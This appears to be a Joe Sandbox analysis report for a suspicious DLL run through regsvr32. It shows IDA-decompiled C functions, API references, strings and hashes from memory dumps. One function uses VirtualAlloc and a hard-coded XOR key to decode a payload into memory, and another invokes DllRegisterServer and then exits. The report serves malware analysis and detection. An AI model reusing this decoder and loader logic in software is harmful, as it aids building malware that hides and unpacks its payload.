Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 5b3810bd1dfc2f7cb2c35ba7318fdc2941c7d859428b9d04d3661772caa0df3a
Instruction ID: a827193b2a0201d6341ffead6b6dfd0a3d62b245169605bb7c04aa60d7859141
Opcode Fuzzy Hash: 5b3810bd1dfc2f7cb2c35ba7318fdc2941c7d859428b9d04d3661772caa0df3a
Instruction Fuzzy Hash: A021FC36619F8481EA50DF6AE49019AA7A4F78A7B8F000635FADD43BA9DF3CD1508B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14679510 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 59
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E00007FFD7FFD14679510(intOrPtr __edx, long long __rcx, void* __rdx, long long _a8, intOrPtr _a16) {
				long long _v16;
				long long _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _t35;
				signed int _t48;
				long long _t63;
				intOrPtr _t64;
				void* _t66;
				void* _t76;
				void* _t77;

				_a16 = __edx;
				_a8 = __rcx;
				_v24 = 0;
				_t63 = "*sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5";
				_v16 = _t63;
				_v32 = E00007FFD7FFD146691B8(_t63, _t66, L"64", _t76, _t77);
				_v36 = E00007FFD7FFD146691B8(_t63, _t66, L"4096", _t76, _t77);
				_t35 = E00007FFD7FFD146691B8(_t63, _t66, L"8192", _t76, _t77);
				r9d = _v32;
				r8d = _v36 | _t35;
				VirtualAlloc(??, ??, ??, ??); // executed
				_v24 = _t63;
				if (_v24 != 0) goto 0x1467958f;
				goto 0x146795f4;
				_v40 = 0;
				goto 0x146795a3;
				_v40 = _v40 + 1;
				if (_v40 - _a16 >= 0) goto 0x146795ef;
				_t64 = _v40;
				_v28 =  *(_a8 + _t64) & 0x000000ff;
				asm("cdq");
				_t48 = _v28 ^  *(_v16 + _t64) & 0x000000ff;
				 *(_v24 + _v40) = _t48;
				goto 0x14679599;
				return _t48;
			}

APIs

VirtualAlloc.KERNELBASE ref: 00007FFD14679578

Strings

*sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5, xrefs: 00007FFD14679526
8192, xrefs: 00007FFD14679552
4096, xrefs: 00007FFD14679542

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID: *sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5$4096$8192
API String ID: 4275171209-3063897839
Opcode ID: 91190bfb5b736a4e483a359375091e0b2d421b3ba45f9d7b7fc30dabc440354d
Instruction ID: 446650238cf4ce4cb6f4fbc043d6f2f52abff4947b4182d02adfa717ba009e71
Opcode Fuzzy Hash: 91190bfb5b736a4e483a359375091e0b2d421b3ba45f9d7b7fc30dabc440354d
Instruction Fuzzy Hash: 6121FC7271CA418BE764CB24E4A06AAB7A1F7CA768F504136F68E83759DF3CD5448F00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD146612B0 Relevance: 6.1, APIs: 4, Instructions: 51
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00007FFD7FFD146612B0(signed int __eax, signed int __rcx, signed int __rdx, signed int _a8, signed int _a16, signed char _a24) {
				long long _v16;
				long long _v24;
				signed long long _v32;
				signed long long _v40;
				void* _t40;
				long long _t54;
				signed long long _t57;
				signed long long _t58;
				void* _t60;

				_a24 = r8b;
				_a16 = __rdx;
				_a8 = __rcx;
				_v40 = 0;
				if (_a8 != 0) goto 0x146612de;
				goto 0x14661397;
				_t42 = __eax % _a16;
				if (0xffffffff - _a8 >= 0) goto 0x146612f8;
				E00007FFD7FFD14664E7C(__eax % _a16, 0xffffffff - _a8, 0xffffffff, _t60);
				_v32 = _a8 * _a16;
				if ((_a24 & 0x000000ff) == 0) goto 0x1466137c;
				if (_v32 - 0x1000 < 0) goto 0x1466137c;
				_v24 = _v32 + 0x27;
				_t54 = _v32;
				if (_v24 - _t54 > 0) goto 0x1466133b;
				E00007FFD7FFD14664E7C(_t42, _v24 - _t54, _t54, _t60);
				E00007FFD7FFD14663D6C(_t54, _v24); // executed
				_v16 = _t54;
				E00007FFD7FFD14669764();
				_t57 = _v16 + 0x00000027 & 0xffffffe0;
				_v40 = _t57;
				_t58 = _t57 * 0xffffffff;
				 *((long long*)(_v40 + _t58)) = _v16;
				goto 0x14661392;
				_t40 = E00007FFD7FFD14663D6C(_t58, _v32);
				_v40 = _t58;
				E00007FFD7FFD14669764();
				return _t40;
			}

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFD146612F3
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFD14661336
new.LIBCMT ref: 00007FFD14661340

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: ff720ffcf4aede3f10a3f13f5346b42280883c8723ff7dc07c368008fd0d958a
Instruction ID: 158fd03a84ecba825b7c167c53516266fad59c8cab0063f9a974961e7b3a268e
Opcode Fuzzy Hash: ff720ffcf4aede3f10a3f13f5346b42280883c8723ff7dc07c368008fd0d958a
Instruction Fuzzy Hash: AD21E33261CF85C1E6608B29E09035AB7A4FB8A7B8F000735F6DE46BE9DF6CD5508B04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466D748 Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00007FFD7FFD1466D748(void* __ebp, long long __rbx, long long __rdi, long long __rsi) {
				void* _t25;
				signed long long _t45;
				signed long long _t47;
				long long _t62;
				signed long long _t63;
				signed long long _t70;
				void* _t71;
				WCHAR* _t75;

				_t45 = _t70;
				 *((long long*)(_t45 + 8)) = __rbx;
				 *((long long*)(_t45 + 0x10)) = _t62;
				 *((long long*)(_t45 + 0x18)) = __rsi;
				 *((long long*)(_t45 + 0x20)) = __rdi;
				_t71 = _t70 - 0x40; // executed
				GetEnvironmentStringsW(); // executed
				if (_t45 != 0) goto 0x1466d778;
				goto 0x1466d83b;
				_t63 = _t45;
				if ( *_t45 == 0) goto 0x1466d79d;
				_t47 = (_t45 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(_t63 + _t47 * 2)) != 0) goto 0x1466d784;
				if ( *((intOrPtr*)(_t63 + _t47 * 2 + 2)) != 0) goto 0x1466d780;
				 *((long long*)(_t71 + 0x38)) = __rsi;
				 *((long long*)(_t71 + 0x30)) = __rsi;
				r9d = __ebp;
				 *((intOrPtr*)(_t71 + 0x28)) = 0;
				 *(_t71 + 0x20) = __rsi;
				E00007FFD7FFD1466D698();
				if (0 != 0) goto 0x1466d7db;
				FreeEnvironmentStringsW(_t75);
				goto 0x1466d771;
				E00007FFD7FFD1466AA18(_t47, 0); // executed
				_t57 = _t47;
				if (_t47 != 0) goto 0x1466d7f4;
				_t25 = E00007FFD7FFD1466A9DC(_t47, 0);
				goto 0x1466d7d0;
				 *((long long*)(_t71 + 0x38)) = __rsi;
				r9d = __ebp;
				 *((long long*)(_t71 + 0x30)) = __rsi;
				 *((intOrPtr*)(_t71 + 0x28)) = r14d;
				 *(_t71 + 0x20) = _t47;
				E00007FFD7FFD1466D698();
				if (_t25 != 0) goto 0x1466d825;
				E00007FFD7FFD1466A9DC(_t47, _t47);
				goto 0x1466d82f;
				E00007FFD7FFD1466A9DC(_t47, _t57);
				return FreeEnvironmentStringsW(??);
			}

0x7ffd1466d748
0x7ffd1466d74b
0x7ffd1466d74f
0x7ffd1466d753
0x7ffd1466d757
0x7ffd1466d75d
0x7ffd1466d761
0x7ffd1466d76f
0x7ffd1466d773
0x7ffd1466d778
0x7ffd1466d77e
0x7ffd1466d784
0x7ffd1466d78c
0x7ffd1466d79b
0x7ffd1466d79d
0x7ffd1466d7a5
0x7ffd1466d7b4
0x7ffd1466d7b7
0x7ffd1466d7bd
0x7ffd1466d7c4
0x7ffd1466d7ce
0x7ffd1466d7d3
0x7ffd1466d7d9
0x7ffd1466d7de
0x7ffd1466d7e3
0x7ffd1466d7e9
0x7ffd1466d7ed
0x7ffd1466d7f2
0x7ffd1466d7f4
0x7ffd1466d7f9
0x7ffd1466d7fc
0x7ffd1466d804
0x7ffd1466d80d
0x7ffd1466d812
0x7ffd1466d819
0x7ffd1466d81e
0x7ffd1466d823
0x7ffd1466d827
0x7ffd1466d855

APIs

GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FFD1466A08B), ref: 00007FFD1466D761
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFD1466A08B), ref: 00007FFD1466D7D3

Part of subcall function 00007FFD1466AA18: RtlAllocateHeap.NTDLL(?,?,?,00007FFD1467040D,?,?,00000000,00007FFD1466D8B7,?,?,?,00007FFD1466A427,?,?,?,00007FFD1466A31D), ref: 00007FFD1466AA56

FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFD1466A08B), ref: 00007FFD1466D832

Part of subcall function 00007FFD1466A9DC: RtlReleasePrivilege.NTDLL(?,?,00000000,00007FFD1466F492,?,?,?,00007FFD1466F4CF,?,?,00000000,00007FFD1466F144,?,?,?,00007FFD1466F077), ref: 00007FFD1466A9F2
Part of subcall function 00007FFD1466A9DC: GetLastError.KERNEL32(?,?,00000000,00007FFD1466F492,?,?,?,00007FFD1466F4CF,?,?,00000000,00007FFD1466F144,?,?,?,00007FFD1466F077), ref: 00007FFD1466A9FC

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: EnvironmentStrings$Free$AllocateErrorHeapLastPrivilegeRelease
String ID:
API String ID: 2360715157-0
Opcode ID: 375de5473a6635352b8acb40982912ac5787743cf0a9cf01d580d03713d4213a
Instruction ID: bb740f14fe3951c5bdba1a17b9d996a03d11fb4f12050da248a85da2958e545a
Opcode Fuzzy Hash: 375de5473a6635352b8acb40982912ac5787743cf0a9cf01d580d03713d4213a
Instruction Fuzzy Hash: 7E319521B18F5685F7249F32A4A00BA76A4BB57BF8F544239E94E53BD5DF3CE4828340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14662970 Relevance: 4.5, APIs: 3, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00007FFD7FFD14662970(void* __edx, void* __eflags, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
				signed int _v16;
				char _v48;
				long long _v56;
				signed long long _v64;
				signed int _v72;
				void* _t35;
				void* _t37;
				signed long long _t39;
				signed long long _t40;
				signed long long _t61;

				_t37 = __eflags;
				_t36 = __edx;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_v56 = 0xfffffffe;
				_t39 =  *0x146de008; // 0x9aee6e3408a0
				_t40 = _t39 ^ _t61;
				_v16 = _t40;
				_v72 = 0;
				E00007FFD7FFD14661760(__edx,  &_v48);
				E00007FFD7FFD14661490(_t40, _a16);
				_v64 = _t40;
				E00007FFD7FFD146611A0(_a24);
				E00007FFD7FFD14662CC0(__edx, _t37, _v64 + _t40,  &_v48, _v64 + _t40, __r8); // executed
				E00007FFD7FFD14662E90( &_v48, _a16);
				E00007FFD7FFD14662E60( &_v48, _a24);
				E00007FFD7FFD146616A0(__edx, _v64 + _t40, _a8,  &_v48);
				_v72 = _v72 | 0x00000001;
				return E00007FFD7FFD14663A70(E00007FFD7FFD14661540( &_v48), _t35, _t36, _v16 ^ _t61);
			}

APIs

char_traits.LIBCPMTD ref: 00007FFD146629C5
type_info::_name_internal_method.LIBCMTD ref: 00007FFD146629EC
type_info::_name_internal_method.LIBCMTD ref: 00007FFD146629FE

Part of subcall function 00007FFD146616A0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD146616BC

Part of subcall function 00007FFD14661540: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD14661567

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::EmptyQueue::StructuredWorktype_info::_name_internal_method$char_traits
String ID:
API String ID: 652137993-0
Opcode ID: 110c28662a49dc0ce0b420f88bf91af1763c08d6580e3a8db95f45a47403bc2f
Instruction ID: da61d05cb87e465bfa588c870fb024702cdaeb395a62dd5964e6157995106203
Opcode Fuzzy Hash: 110c28662a49dc0ce0b420f88bf91af1763c08d6580e3a8db95f45a47403bc2f
Instruction Fuzzy Hash: E1112462618E4181EA50DB25E4A11EBB760FBC67F4F401131F6CE876A9DF3CD1458B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14661B40 Relevance: 4.5, APIs: 3, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00007FFD7FFD14661B40(void* __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
				signed char _t23;

				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if ((E00007FFD7FFD14662250(__rax, _a8, _a16) & 0x000000ff) == 0) goto 0x14661b97;
				E00007FFD7FFD146618F0(__rax, _a8);
				E00007FFD7FFD14661BF0(_a16 - __rax, _a8, _a8, _a16 - __rax, _a24);
				goto 0x14661be0;
				r8d = 0;
				_t23 = E00007FFD7FFD146622B0(_t31, _a8, _a24); // executed
				if ((_t23 & 0x000000ff) == 0) goto 0x14661bdb;
				E00007FFD7FFD146618F0(_t31, _a8);
				E00007FFD7FFD146611E0(_t31, _a16, _a24);
				return E00007FFD7FFD146623A0(_t31, _a8, _a24);
			}

0x7ffd14661b40
0x7ffd14661b45
0x7ffd14661b4a
0x7ffd14661b67
0x7ffd14661b6e
0x7ffd14661b90
0x7ffd14661b95
0x7ffd14661b97
0x7ffd14661ba4
0x7ffd14661bae
0x7ffd14661bb5
0x7ffd14661bc7
0x7ffd14661be4

APIs

Part of subcall function 00007FFD14662250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD1466226B
Part of subcall function 00007FFD14662250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD1466227C

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14661B6E

Part of subcall function 00007FFD146618F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD146618FE

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14661BB5
char_traits.LIBCPMTD ref: 00007FFD14661BC7

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityQueue$EmptyQueue::Structuredchar_traits
String ID:
API String ID: 872432861-0
Opcode ID: 7aa3d2372c1ca0d652da04669d2a978a39a877f23c15b1fa6cc72aa4e53f0d09
Instruction ID: 373707bb43bee686a5c7c6866847b4355d45b707ec9e73dcfd5640a556a9b103
Opcode Fuzzy Hash: 7aa3d2372c1ca0d652da04669d2a978a39a877f23c15b1fa6cc72aa4e53f0d09
Instruction Fuzzy Hash: 9911A26573CE8181EA40DB66E4A14AB6364FBC7BE4F105036FE8E87B5ADE2CD5008B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14663F18 Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00007FFD7FFD14663F18(void* __ecx) {
				void* __rbx;
				void* _t12;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;

				_t2 =  ==  ? 1 :  *0x146df1a0 & 0x000000ff;
				 *0x146df1a0 =  ==  ? 1 :  *0x146df1a0 & 0x000000ff;
				E00007FFD7FFD14664760(1, _t12, _t17, _t18, _t19, _t20);
				if (E00007FFD7FFD14666AC0() != 0) goto 0x14663f47;
				goto 0x14663f5b; // executed
				E00007FFD7FFD1466A844(_t17); // executed
				if (0 != 0) goto 0x14663f59;
				E00007FFD7FFD14666B1C(0);
				goto 0x14663f43;
				return 1;
			}

0x7ffd14663f2c
0x7ffd14663f2f
0x7ffd14663f35
0x7ffd14663f41
0x7ffd14663f45
0x7ffd14663f47
0x7ffd14663f4e
0x7ffd14663f52
0x7ffd14663f57
0x7ffd14663f60

APIs

__isa_available_init.LIBCMT ref: 00007FFD14663F35
__vcrt_initialize.LIBVCRUNTIME ref: 00007FFD14663F3A

Part of subcall function 00007FFD14666AC0: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FFD14666AC4
Part of subcall function 00007FFD14666AC0: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FFD14666AC9
Part of subcall function 00007FFD14666AC0: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FFD14666ACE

__vcrt_uninitialize.LIBVCRUNTIME ref: 00007FFD14663F52

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
String ID:
API String ID: 3388242289-0
Opcode ID: 5d9032b98b00912ce65cde94096c8696e72d1c768cb864a179bbf2be0d6f6683
Instruction ID: 4c319d555e30f41a64b5fb3183bde4674b8d751bfebcea4c3116725184933578
Opcode Fuzzy Hash: 5d9032b98b00912ce65cde94096c8696e72d1c768cb864a179bbf2be0d6f6683
Instruction Fuzzy Hash: 21E04F60F0C98345FE28267135F22F916A40F2B33CF4440BDE89E421C3CE1D78AE6661

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14673F70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00007FFD7FFD14673F70() {
				long long _v24;
				long long _t5;
				intOrPtr _t7;

				_v24 = 0;
				_t7 =  *0x146dfdd8; // 0x180000000
				E00007FFD7FFD14679600(_t5, "fx", _t7, "DllRegisterServer");
				_v24 = _t5;
				ExitProcess(??);
			}

0x7ffd14673f74
0x7ffd14673f84
0x7ffd14673f92
0x7ffd14673f97
0x7ffd14673f9c

APIs

ExitProcess.KERNEL32 ref: 00007FFD14673F9C

Strings

DllRegisterServer, xrefs: 00007FFD14673F7D

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: ExitProcess
String ID: DllRegisterServer
API String ID: 621844428-1663957109
Opcode ID: daa4509797ac003af5991cc102a2f8bbc2bd6225bef9e83475646ccea547d58a
Instruction ID: 7e7f7e7e3e1513f4d6a0f97548dda05d1252fb8ee773a9fdbdb1d944207c2f1d
Opcode Fuzzy Hash: daa4509797ac003af5991cc102a2f8bbc2bd6225bef9e83475646ccea547d58a
Instruction Fuzzy Hash: F7D01760B19E8281F620AB20E8A53DA23A0BB8B32CF900231D58D42265CF3CD209CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466A9DC Relevance: 3.0, APIs: 2, Instructions: 19
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 68%

			E00007FFD7FFD1466A9DC(intOrPtr* __rax, void* __rcx) {
				int _t1;
				intOrPtr _t3;
				void* _t4;
				void* _t11;
				intOrPtr _t14;

				if (__rcx == 0) goto 0x1466aa17;
				_t14 =  *0x146df930; // 0x4e0000, executed
				_t1 = HeapFree(_t11, ??); // executed
				if (_t1 != 0) goto 0x1466aa12;
				_t3 = E00007FFD7FFD1466B34C(GetLastError(), __rax, _t14, __rcx);
				_t4 = E00007FFD7FFD1466B420(__rax);
				 *__rax = _t3;
				return _t4;
			}

0x7ffd1466a9df
0x7ffd1466a9eb
0x7ffd1466a9f2
0x7ffd1466a9fa
0x7ffd1466aa04
0x7ffd1466aa0b
0x7ffd1466aa10
0x7ffd1466aa17

APIs

RtlReleasePrivilege.NTDLL(?,?,00000000,00007FFD1466F492,?,?,?,00007FFD1466F4CF,?,?,00000000,00007FFD1466F144,?,?,?,00007FFD1466F077), ref: 00007FFD1466A9F2
GetLastError.KERNEL32(?,?,00000000,00007FFD1466F492,?,?,?,00007FFD1466F4CF,?,?,00000000,00007FFD1466F144,?,?,?,00007FFD1466F077), ref: 00007FFD1466A9FC

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: ErrorLastPrivilegeRelease
String ID:
API String ID: 1334314998-0
Opcode ID: 1178260e8bffcb175f16ce8929f72affff1d2575aebcf493ec367cb625912061
Instruction ID: fab6aeb8219406b1f7b90237215719eb09a8239e4de016929b7d3c00d5851948
Opcode Fuzzy Hash: 1178260e8bffcb175f16ce8929f72affff1d2575aebcf493ec367cb625912061
Instruction Fuzzy Hash: 85E08C10F19E03C2FF086BB298F40F812909F87B3CF444034C90D96262EE3CAC454204

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800284B0 Relevance: 1.6, APIs: 1, Instructions: 121processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE ref: 000000018002867E

Memory Dump Source

Source File: 00000003.00000002.262118091.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
Instruction ID: b9dfd44ec2654d149dbfc67a3d285e1c446cc2681133f70a5a1c8efdf6c35088
Opcode Fuzzy Hash: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
Instruction Fuzzy Hash: 59415D7090C7848FE7B8DF18D48979ABBE0FB88315F108A1EE48DC7291DB349448CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD146622B0 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E00007FFD7FFD146622B0(long long __rax, long long __rcx, long long __rdx, long long _a8, long long _a16, signed char _a24) {
				long long _v16;
				signed char _v24;
				intOrPtr* _t48;
				intOrPtr* _t50;

				_t48 = __rax;
				_a24 = r8b;
				_a16 = __rdx;
				_a8 = __rcx;
				E00007FFD7FFD14662830(__rax, _a8);
				if (_t48 - _a16 >= 0) goto 0x146622de;
				E00007FFD7FFD14662230(_a8);
				E00007FFD7FFD14662150(_t48, _a8);
				if ( *_t48 - _a16 >= 0) goto 0x14662310;
				E00007FFD7FFD14662170(_t48, _a8);
				E00007FFD7FFD14662600(_a8, _a16,  *_t48); // executed
				goto 0x1466237a;
				if ((_a24 & 0x000000ff) == 0) goto 0x14662366;
				if (_a16 - 0x10 >= 0) goto 0x14662366;
				E00007FFD7FFD14662170(_t48, _a8);
				if (_a16 -  *_t48 >= 0) goto 0x14662341;
				_t50 = _a16;
